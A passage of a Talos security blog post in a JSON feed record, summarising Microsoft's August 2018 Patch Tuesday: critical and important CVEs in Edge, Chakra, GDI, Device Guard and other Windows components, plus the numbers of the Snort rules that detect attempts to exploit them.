[CVE-2018-8380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8380>), [CVE-2018-8381](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8381>) and [CVE-2018-8384](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8384>) are remote code execution vulnerabilities that exist in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge. An attacker who successfully exploits the vulnerability can potentially gain the same user rights as the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements.\n\n \n\n\n[CVE-2018-8397](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8397>) is a remote code execution vulnerability that exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. By leveraging a web-based attack, an attacker can convince a user to visit a webpage that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. An attacker can also provide a specially crafted document file that is designed to exploit the vulnerability, and then convince users to open the document file.\n\nOther vulnerabilities deemed \"critical\" are listed below:\n\n \n\n\n[CVE-2018-8345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8345>) LNK Remote Code Execution Vulnerability\n\n[CVE-2018-8359](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8359>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8371](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8371>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8372](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8372>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8377](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8377>) Microsoft Edge Memory Corruption Vulnerability\n\n[CVE-2018-8385](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8385>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8387](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8387>) Microsoft Edge Memory Corruption Vulnerability\n\n[CVE-2018-8390](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8390>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8403](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8403>) Microsoft Browser Memory Corruption Vulnerability\n\n### Important Vulnerabilities\n\n \n\n\nThis month, Microsoft is addressing 38 vulnerabilities that are rated \"important.\" Talos believes two of these are notable and require prompt attention.\n\n \n\n\n[CVE-2018-8200](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8200>) is a vulnerability that exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploits this vulnerability can potentially inject code into a trusted PowerShell process to bypass the Device Guard code integrity policy on the local machine. To exploit the vulnerability, an attacker would first have to access the local machine and then inject malicious code into a script that is trusted by the policy. The injected code would then run with the same trust level as the script and bypass the policy.\n\n \n\n\n[CVE-2018-8340](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8340>) is a vulnerability in the Windows Authentication Methods, and enables an Active Directory Federation Services (AD FS) Security Bypass vulnerability. An attacker who successfully exploits this vulnerability could bypass some, but not all, of the authentication factors.\n\n \n\n\nOther vulnerabilities deemed \"important\" are listed below:\n\n \n\n\n[CVE-2018-0952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0952>) Diagnostic Hub Standard Collector Elevation Of Privilege Vulnerability\n\n[CVE-2018-8204](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8204>) Device Guard Code Integrity Policy Security Feature Bypass Vulnerability\n\n[CVE-2018-8253](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8253>) Cortana Elevation of Privilege Vulnerability\n\n[CVE-2018-8316](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8316>) Internet Explorer Remote Code Execution Vulnerability\n\n[CVE-2018-8339](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8339>) Windows Installer Elevation of Privilege Vulnerability\n\n[CVE-2018-8341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8341>) Windows Kernel Information Disclosure Vulnerability\n\n[CVE-2018-8342](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8342>) Windows NDIS Elevation of Privilege Vulnerability\n\n[CVE-2018-8343](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8343>) Windows NDIS Elevation of Privilege Vulnerability\n\n[CVE-2018-8346](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8346>) LNK Remote Code Execution Vulnerability\n\n[CVE-2018-8347](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8347>) Windows Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8348](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8348>) Windows Kernel Information Disclosure Vulnerability\n\n[CVE-2018-8349](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8349>) Microsoft COM for Windows Remote Code Execution Vulnerability\n\n[CVE-2018-8351](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8351>) Microsoft Edge Information Disclosure Vulnerability\n\n[CVE-2018-8353](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8353>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8357](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8357>) Microsoft Browser Elevation of Privilege Vulnerability\n\n[CVE-2018-8358](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8358>) Microsoft Browser Security Feature Bypass Vulnerability\n\n[CVE-2018-8360](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8360>) .NET Framework Information Disclosure Vulnerability\n\n[CVE-2018-8370](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8370>) Microsoft Edge Information Disclosure Vulnerability\n\n[CVE-2018-8375](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8375>) Microsoft Excel Remote Code Execution Vulnerability\n\n[CVE-2018-8376](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8376>) Microsoft PowerPoint Remote Code Execution Vulnerability\n\n[CVE-2018-8378](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8378>) Microsoft Office Information Disclosure Vulnerability\n\n[CVE-2018-8379](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8379>) Microsoft Excel Remote Code Execution Vulnerability\n\n[CVE-2018-8382](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8382>) Microsoft Excel Information Disclosure Vulnerability\n\n[CVE-2018-8383](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8383>) Microsoft Edge Spoofing Vulnerability\n\n[CVE-2018-8389](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8389>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8394](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8394>) Windows GDI Information Disclosure Vulnerability\n\n[CVE-2018-8396](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8396>) Windows GDI Information Disclosure Vulnerability\n\n[CVE-2018-8398](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8398>) Windows GDI Information Disclosure Vulnerability\n\n[CVE-2018-8399](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8399>) Win32k Elevation of Privilege Vulnerability\n\n[CVE-2018-8400](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8400>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8401](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8401>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8404](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8404>) Win32k Elevation of Privilege Vulnerability\n\n[CVE-2018-8405](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8405>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8406](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8406>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8412>) Microsoft (MAU) Office Elevation of Privilege Vulnerability\n\n[CVE-2018-8414](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8414>) Windows Shell Remote Code Execution Vulnerability\n\n### Coverage\n\n \n\n\nIn response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.\n\n \n\n\nSnort Rules:\n\n \n\n\n45877-45878, 46548-46549, 46999-47002, 47474-47493, 47495-47496, 47503-47504, 47512-47513, 47515-47520\n\n \n", "modified": "2018-08-14T18:26:00", "published": "2018-08-14T11:26:00", "id": "TALOSBLOG:A9E55A97439608C62C1BF62669B8074A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/8ZjMNLg4_Bs/ms-tuesday.html", "type": "talosblog", "title": "Microsoft Tuesday August 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}